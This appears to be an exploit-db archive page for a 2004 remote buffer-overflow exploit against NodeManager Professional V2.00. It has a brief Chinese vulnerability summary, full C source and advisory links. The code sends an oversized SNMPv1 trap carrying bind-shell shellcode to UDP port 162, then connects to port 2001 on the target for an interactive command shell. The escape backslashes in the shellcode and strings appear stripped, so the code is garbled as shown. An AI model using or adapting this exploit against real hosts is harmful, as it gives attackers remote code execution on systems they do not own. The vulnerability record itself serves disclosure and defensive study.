https://www.exploit-db.com/exploits/761
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-371

NodeManagerProfessional是一款网络管理监控工具，它可以接收SNMPv1的消息，显示并记录相关的信息。NodeManagerProfessional在处理SNMPTrap报文时存在缓冲区溢出漏洞，远程攻击者可能利用此漏洞在服务器上执行任意指令。

/* Included stdio.h for my compile errors /str0ke */
//**************************************************************************
// NodeManager Professional V2.00 Buffer Overflow Vulnerability
// Bind Shell Exploit for English Win2K/XP
// 21 Dec 2004
//
// NodeManager Professional is a network management and monitoring tool.
// It receives SNMPv1 traps and displays them on screen and logs them to
// a file.  NodeManager Professional V2.00 has a stack overflow
// vulnerability that can be exploited by sending a specially crafted
// SNMPv1 trap.
//
// NodeManager Professional allows the user to use a format string to
// customize how each received trap is logged.  For example, the default
// format string for the LinkDown event is
//
// "Snmp Trap LinkDown (EnterPrise=%EPRISE ObjectID=%OID Value=%DATA)"
//
// When a LinkDown-Trap packet is received, the various placeholders
// (e.g. %OID, %DATA) will be replaced with the received values.  The
// resulting string is then displayed on screen and written out to a log file.
// The various fields from the received LinkDown-Trap UDP packet is first copied
// to global buffers in the .data segment.  When the format string is parsed,
// each received value is first copied to a 512-byte local stack buffer before
// it is concatenated to the final string.
//
// By sending more than 512 bytes in the Trap DATA field, it is possible
// to overflow the stack buffer and overwrite the EIP.
//
//
// This exploit code binds shell on port 2001 of a system running a vulnerable
// version of NodeManager Professional.
//
// Advisory
// http://www.security.org.sg/vuln/nodemanager200.html
//
// Greetz: snooq, sk, and all guys at SIG^2 G-TEC
// (http://www.security.org.sg/webdocs/g-tec.html)
//
//**************************************************************************

#include <windows.h>
#include <winsock2.h>
#include <string.h>
#include <malloc.h>
#include <conio.h>
#include <stdlib.h>
#include <stdio.h>

#pragma comment(lib,"ws2_32.lib")

unsigned char evilTrap[] =
"x30x82x02x44x02x01x00x04x06x70x75x62x6Cx69x63xA4"
"x82x02x35x06x09x2Bx06x01x02x03x04x05x06x07x40x04"
"x7Fx00x00x01x02x01x02x02x01x00x43x02x12x34x30x82"
"x02x16x30x82x02x12x06x08x2Bx06x01x02x03x04x05x06"
"x04x82x02x04x41x41x41x41x41x41x41x41x90x90x90xCC"

		// bindshell on port 2001
        "xEBx62x55x8BxECx51x56x57x8Bx5Dx08x8Bx73x3Cx8Bx74"
        "x33x78x03xF3x8Bx7Ex20x03xFBx8Bx4Ex18x56x33xD2x8B"
        "x37x03x75x08x33xDBx33xC0xACx85xC0x74x09xC1xCBx0C"
        "xD1xCBx03xD8xEBxF0x3Bx5Dx0Cx74x0Bx83xC7x04x42xE2"
        "xDEx5Ex33xC0xEBx17x5Ex8Bx7Ex24x03x7Dx08x66x8Bx04"
        "x57x8Bx7Ex1Cx03x7Dx08x8Bx04x87x03x45x08x5Fx5Ex59"
        "x8BxE5x5DxC3x55x8BxECx33xC9xB1xC8x2BxE1x32xC0x8B"
        "xFCxF3xAAxB1x30x64x8Bx01x8Bx40x0Cx8Bx70x1CxADx8B"
        "x58x08x89x5DxFCx68x8Ex4Ex0ExECxFFx75xFCxE8x70xFF"
        "xFFxFFx83xC4x08xBBxAAxAAx6Cx6CxC1xEBx10x53x68x33"
        "x32x2Ex64x68x77x73x32x5Fx54xFFxD0x89x45xF8xEBx35"
        "x5Ex8Dx7DxF4x33xC9xB1x09xFFx36xFFx75xFCxE8x40xFF"
        "xFFxFFx83xC4x08x85xC0x75x0Ex90xFFx36xFFx75xF8xE8"
        "x2ExFFxFFxFFx83xC4x08x89x07x33xC0xB0x04x03xF0x2B"
        "xF8xE2xD5xEBx29xE8xC6xFFxFFxFFx72xFExB3x16x35x54"
        "x8AxA1xA4xADx2ExE9xA4x1Ax70xC7xD9x09xF5xADxCBxED"
        "xFCx3Bx7ExD8xE2x73xE7x79xC6x79xADxD9x05xCEx54x6A"
        "x02xFFx55xE0x33xC0x50x50x50x50x6Ax01x6Ax02xFFx55"
        "xE4x89x45xD0x33xC0x50xB8xFDxFFxF8x2Ex83xF0xFFx50"
        "x8BxC4x6Ax10x50xFFx75xD0xFFx55xE8x6Ax05xFFx75xD0"
        "xFFx55xECx85xC0x75x68x8BxCCx6Ax10x8BxDCx33xC0x50"
        "x50x53x51xFFx75xD0xFFx55xF0x8BxD0x5Bx83xF0xFFx74"
        "x4Ex8BxFCx33xC9xB1x64x33xC0xF3xAAxC6x04x24x44x66"
        "xC7x44x24x2Cx01x01x89x54x24x38x89x54x24x3Cx89x54"
        "x24x40x8BxC4x8Dx58x44xB9xFFx63x6Dx64xC1xE9x08x51"
        "x8BxCCx52x53x53x50x33xC0x50x50x50x6Ax01x50x50x51"
        "x50xFFx55xF4x5Bx6AxFFxFFx33xFFx55xD4xFFx55xD8xFF"
        "x75xD0xFFx55xD8x50xFFx55xDCx41x41x41x41x41x41x41"

"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41"
"x9Cx48x43x00";		// hardcoded return address (in data segment)


void shell(int sockfd)
{
	char buffer[1024];
	fd_set rset;
	FD_ZERO(&rset);

	for(;;)
	{
		if(kbhit() != 0)
		{
			fgets(buffer, sizeof(buffer) - 2, stdin);
			send(sockfd, buffer, strlen(buffer), 0);
		}

		FD_ZERO(&rset);
		FD_SET(sockfd, &rset);

		timeval tv;
		tv.tv_sec = 0;
		tv.tv_usec = 50;

		if(select(0, &rset, NULL, NULL, &tv) == SOCKET_ERROR)
		{
			printf("select errorn");
			break;
		}

		if(FD_ISSET(sockfd, &rset))
		{
			int n;

			ZeroMemory(buffer, sizeof(buffer));
			if((n = recv(sockfd, buffer, sizeof(buffer), 0)) <= 0)
			{
				printf("EOFn");
				return;
			}
			else
			{
				fwrite(buffer, 1, n, stdout);
			}
		}
	}
}


void printUsage(char *filename)
{
		printf("nUsage: %s <test type> <ip addr>nn", filename);
		printf("Test Type : 1 - Crashn");
		printf("            2 - BindShell on Port 2001nn");
}

int main(int argc, char* argv[])
{
	int sock;
	WSADATA wsd;

	if(argc != 3)
	{
		printUsage(argv[0]);
		return 1;
	}
	int testType = atoi(argv[1]);
	if(testType != 1 && testType != 2)
	{
		printUsage(argv[0]);
		return 1;
	}

	if (WSAStartup(MAKEWORD(2,2), &wsd) != 0)
	{
		printf("WSAStartup() failed: %dn", GetLastError());
		return -1;
	}

	sock = socket(AF_INET, SOCK_DGRAM, 0);
	if(sock < 0)
	{
		printf("socket() error!n");
		WSACleanup();
		return 1;
	}

	struct sockaddr_in dest;
	dest.sin_family = AF_INET;
	dest.sin_port = htons(162);
	dest.sin_addr.s_addr = inet_addr(argv[2]);

	struct sockaddr_in local;
	local.sin_family = AF_INET;
	local.sin_port = htons(0);
	local.sin_addr.s_addr = htonl(INADDR_ANY);

	if(bind(sock, (struct sockaddr *)&local, sizeof(local)) < 0)
	{
		printf("Exploit Failed. SOCKET_ERROR return in bind() call.n");
		closesocket(sock);
		WSACleanup();
		return 1;
	}

	if(testType == 1)
	{
		DWORD *ptr = (DWORD *)(evilTrap + sizeof(evilTrap) - 5);
		*ptr = 0x41414141;

	}

	int structLen = sizeof(dest);

	int sendSize = sendto(sock, (char *)evilTrap, sizeof(evilTrap)-1, 0, (struct sockaddr *)&dest, structLen);

	if(sendSize < 0)
	{
		printf("Exploit Failed. SOCKET_ERROR return in sendto() call.n");
	}
	else
		printf("Exploit Sent. Size: %d bytesn", sendSize);

	if(testType == 2)
		printf("Connecting to port 2001 on target. . .");
	Sleep(2000);
	closesocket(sock);

	if(testType == 2)
	{
		struct sockaddr_in sin;
		//================================= Connect to the target ==============================
		sock = socket(AF_INET, SOCK_STREAM, 0);
		if(sock == INVALID_SOCKET)
		{
			printf("nInvalid socket return in socket() call.n");
			WSACleanup();
			return -1;
		}

		sin.sin_family = AF_INET;
		sin.sin_port = htons(2001);
		sin.sin_addr.s_addr = inet_addr(argv[2]);

		if(connect(sock, (sockaddr *)&sin, sizeof(sin)) == SOCKET_ERROR)
		{
			printf("nExploit Failed. SOCKET_ERROR return in connect() call.n");
			closesocket(sock);
			WSACleanup();
			return -1;
		}
		printf("nnSuccess!nn");
		shell(sock);

		closesocket(sock);
	}

	WSACleanup();

	return 0;
}

// milw0rm.com [2005-01-18]

来源:XF
名称:nodemanager-linkdown-bo(18937)
链接:http://xforce.iss.net/xforce/xfdb/18937
来源:MISC
链接:http://www.security.org.sg/vuln/nodemanager200.html
来源:SECUNIA
名称:13881
链接:http://secunia.com/advisories/13881/
来源:BUGTRAQ
名称:20050117[SIG^2G-TEC]NodeManagerProfessionalV2.00BufferOverflowVulnerability
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=110599796118583&w;=2
来源:BID
名称:12283
链接:http://www.securityfocus.com/bid/12283
来源:SECTRACK
名称:1012915
链接:http://securitytracker.com/id?1012915